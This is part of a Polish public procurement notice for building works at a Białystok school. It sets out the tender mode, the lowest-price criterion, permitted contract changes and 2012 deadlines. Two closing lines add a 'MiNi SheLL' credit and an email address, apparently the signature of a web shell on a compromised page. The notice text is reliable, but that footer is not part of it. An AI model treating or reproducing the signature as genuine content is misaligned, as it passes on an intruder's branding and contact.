<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty  Wykonawcy, w następującym zakresie  i okolicznościach:
1) zmiany   terminu zakończenia  wykonania przedmiotu umowy o czas  opóźnienia , jeżeli takie opóźnienie  jest  lub będzie  miało wpływ  na wykonanie przedmiotu umowy pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona,  w następujących przypadkach:
a)	wstrzymanie realizacji robót przez Zamawiającego, z przyczyn niezależnych od Zamawiającego,
b)	wstrzymanie realizacji robót przez właściwe organy administracji publicznej bądź orzeczeniem sądu,
c)	konieczności usunięcia błędów w dokumentacji projektowej w trakcie realizacji inwestycji, niezbędnych  do prawidłowego wykonania  przedmiotu umowy, 
d)	konieczności wykonania robót  wykopaliskowych  uniemożliwiających  wykonanie przedmiotu umowy,
e)	z uwagi na siłę wyższą lub inne okoliczności niezależne od stron, lub których strony przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć. Za siłę wyższą uważa się zdarzenia zewnętrzne, których  skutków nie da się przewidzieć ani im zapobiec;
f)	  zmiany obowiązujących  przepisów prawa,
2)	zmiany  materiałów koniecznych do wykonywania robót pod warunkiem,  że zmiana ta będzie   korzystna dla Zamawiającego  lub wynikająca z niedostępności na rynku  tych materiałów spowodowanej  zaprzestaniem produkcji lub wycofaniem  z rynku,
3)	wystąpienia  warunków geologicznych, archeologicznych lub terenowych odmiennych od przyjętych w dokumentacji projektowej, w szczególności  istnienie podziemnych  urządzeń, instalacji lub obiektów infrastrukturalnych,
4)	wprowadzenia zmian w stosunku do dokumentacji projektowej na wykonanie robót zamiennych  nie  wykraczających poza zakres przedmiotu zamówienia w sytuacji konieczności zwiększenia bezpieczeństwa realizacji  robót budowlanych, usprawnienia procesu budowy bądź usunięcia wad ukrytych  dokumentacji projektowej i uzyskania założonego efektu użytkowego oraz zmiany obowiązujących  przepisów prawa; 
5)	zmniejszenia zakresu rzeczowego  w obiektywnie uzasadnionych  przypadkach, 
6)	zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego  na taką zmianę oraz  spełnieniem przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny,
7)	zmiany wynagrodzenia ryczałtowego brutto w przypadku zmiany obowiązującej wysokości stawki podatku VAT o różnicę wynikającą z tej zmiany,
8)	zmiany kierownika robót, przedstawionego w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika robót w sytuacji, gdy:
a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika robót w przypadkach:
    - choroby lub innych zdarzeń losowych dotyczących kierownika robót lub nie wywiązywania się kierownika robót z obowiązków wynikających z umowy,
     - jeżeli zmiana kierownika robót będzie niezbędna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacja),
b) Zamawiający może żądać od Wykonawcy zmiany kierownika robót, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić kierownika robót zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie.
   W przypadku zmiany kierownika robót - nowy kierownik robót musi spełniać wymagania określone w SIWZ dla danego specjalisty;
9) jeśli w ramach wykazania spełniania warunku wiedzy i doświadczenia Wykonawca korzysta  z zasobów podmiotu trzeciego, który będzie brał udział w realizacji części zamówienia jako podwykonawca - Zamawiający dopuszcza możliwość zmiany podwykonawcy jeśli wykaże on, że posiada co najmniej takie doświadczenie jakie wymagane było dla spełnienia warunku wiedzy   i doświadczenia;
10) zmiany unormowań prawnych powszechnie obowiązujących, które będą miały wpływ na realizację umowy.
Warunkiem  dokonania zmiany, o których mowa powyżej, jest złożenie uzasadnionego wniosku przez stronę  inicjującą zmianę lub sporządzenie przez strony  stosownego protokołu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zespolszkolnr1.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 1 im. Gen. Władysława Sikorskiego  w Białymstoku, przy ul. Leśnej 30, (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 16:15, miejsce: Zespół Szkół Nr 1 im. Gen. Władysława Sikorskiego  w Białymstoku, przy ul. Leśnej 30, (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com